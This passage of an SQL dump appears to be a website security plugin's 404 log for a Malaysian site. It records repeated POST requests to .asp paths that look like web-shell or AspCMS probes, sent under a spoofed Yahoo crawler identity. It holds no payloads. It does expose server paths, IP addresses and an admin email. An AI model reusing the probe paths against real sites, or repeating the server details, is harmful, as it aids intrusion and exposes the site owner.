Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"211.146.126.205\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"211.146.126.205\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/images/imgs.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/images/imgs.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-TPa6CYj3S7An3VFFrVAAAAUM\";s:12:\"REDIRECT_URL\";s:16:\"/images/imgs.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"62886\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/images/imgs.asp\";s:10:\"SCRIPT_URL\";s:16:\"/images/imgs.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-TPa6CYj3S7An3VFFrVAAAAUM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803965.9149\";s:12:\"REQUEST_TIME\";s:10:\"1571803965\";}}','notice','2019-10-23 04:12:48','2019-10-23 04:12:46',35269904,37081784,'http://bintara.com.my//images/imgs.asp',1,0,'211.146.126.205'),(28805,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//images/images.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"220.249.245.253\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"220.249.245.253\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/images/images.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/images/images.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-TcCGcwml6EYyVWZHU4wAAAIs\";s:12:\"REDIRECT_URL\";s:18:\"/images/images.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"63786\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/images/images.asp\";s:10:\"SCRIPT_URL\";s:18:\"/images/images.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-TcCGcwml6EYyVWZHU4wAAAIs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804016.6899\";s:12:\"REQUEST_TIME\";s:10:\"1571804016\";}}','notice','2019-10-23 04:13:39','2019-10-23 04:13:37',35338816,37136920,'http://bintara.com.my//images/images.asp',1,0,'220.249.245.253'),(28806,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//images/images.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"219.243.167.248\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"219.243.167.248\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/images/images.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/images/images.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-TdiGcwml6EYyVWZHU5AAAAI4\";s:12:\"REDIRECT_URL\";s:18:\"/images/images.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"63786\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/images/images.asp\";s:10:\"SCRIPT_URL\";s:18:\"/images/images.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-TdiGcwml6EYyVWZHU5AAAAI4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804022.4829\";s:12:\"REQUEST_TIME\";s:10:\"1571804022\";}}','notice','2019-10-23 04:13:44','2019-10-23 04:13:42',35268192,37059576,'http://bintara.com.my//images/images.asp',1,0,'219.243.167.248'),(28807,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//consn/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"821\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"222.180.179.255\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"222.180.179.255\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/consn/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/consn/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-Tg66CYj3S7An3VFFrbAAAAVE\";s:12:\"REDIRECT_URL\";s:16:\"/consn/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"64679\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/consn/index.asp\";s:10:\"SCRIPT_URL\";s:16:\"/consn/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-Tg66CYj3S7An3VFFrbAAAAVE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804035.1789\";s:12:\"REQUEST_TIME\";s:10:\"1571804035\";}}','notice','2019-10-23 04:13:58','2019-10-23 04:13:55',35344368,37142656,'http://bintara.com.my//consn/index.asp',1,0,'222.180.179.255'),(28808,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//consn/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"117.75.128.132\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"117.75.128.132\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/consn/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/consn/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-Tk@HARMCuuKQiJT-8@QAAAME\";s:12:\"REDIRECT_URL\";s:16:\"/consn/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"65074\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/consn/index.asp\";s:10:\"SCRIPT_URL\";s:16:\"/consn/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-Tk@HARMCuuKQiJT-8@QAAAME\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804051.4666\";s:12:\"REQUEST_TIME\";s:10:\"1571804051\";}}','notice','2019-10-23 04:14:13','2019-10-23 04:14:11',35269432,37075272,'http://bintara.com.my//consn/index.asp',1,0,'117.75.128.132'),(28809,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//inc/AspCms_AdvJs.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"210.38.15.214\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"210.38.15.214\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/inc/AspCms_AdvJs.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/inc/AspCms_AdvJs.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-Tpa6CYj3S7An3VFFrgAAAAVA\";s:12:\"REDIRECT_URL\";s:21:\"/inc/AspCms_AdvJs.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"49177\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/inc/AspCms_AdvJs.asp\";s:10:\"SCRIPT_URL\";s:21:\"/inc/AspCms_AdvJs.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-Tpa6CYj3S7An3VFFrgAAAAVA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804069.4043\";s:12:\"REQUEST_TIME\";s:10:\"1571804069\";}}','notice','2019-10-23 04:14:32','2019-10-23 04:14:30',35342608,37147936,'http://bintara.com.my//inc/AspCms_AdvJs.asp',1,0,'210.38.15.214'),(28810,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//inc/AspCms_AdvJs.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"202.116.206.195\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"202.116.206.195\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/inc/AspCms_AdvJs.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/inc/AspCms_AdvJs.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-Tsa6CYj3S7An3VFFrgwAAAUE\";s:12:\"REDIRECT_URL\";s:21:\"/inc/AspCms_AdvJs.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"49419\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/inc/AspCms_AdvJs.asp\";s:10:\"SCRIPT_URL\";s:21:\"/inc/AspCms_AdvJs.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-Tsa6CYj3S7An3VFFrgwAAAUE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804082.0088\";s:12:\"REQUEST_TIME\";s:10:\"1571804082\";}}','notice','2019-10-23 04:14:43','2019-10-23 04:14:42',35270800,37075784,'http://bintara.com.my//inc/AspCms_AdvJs.asp',1,0,'202.116.206.195'),(28811,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"821\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"222.240.141.121\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"222.240.141.121\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-TuK6CYj3S7An3VFFrhgAAAUk\";s:12:\"REDIRECT_URL\";s:16:\"/admin/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"49419\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/index.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-TuK6CYj3S7An3VFFrhgAAAUk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804088.3036\";s:12:\"REQUEST_TIME\";s:10:\"1571804088\";}}','notice','2019-10-23 04:14:51','2019-10-23 04:14:48',35344368,37142656,'http://bintara.com.my//admin/index.asp',1,0,'222.240.141.121'),(28812,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.113.48.111\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.113.48.111\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-TwtaMiBShLW1lPtcTUwAAAA0\";s:12:\"REDIRECT_URL\";s:16:\"/admin/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"49945\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/index.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-TwtaMiBShLW1lPtcTUwAAAA0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571804098.3206\";s:12:\"REQUEST_TIME\";s:10:\"1571804098\";}}','notice','2019-10-23 04:15:00','2019-10-23 04:14:58',35269432,37075272,'http://bintara.com.my//admin/index.asp',1,0,'220.113.48.111'),(28813,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//A-LlobetPics.rar.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 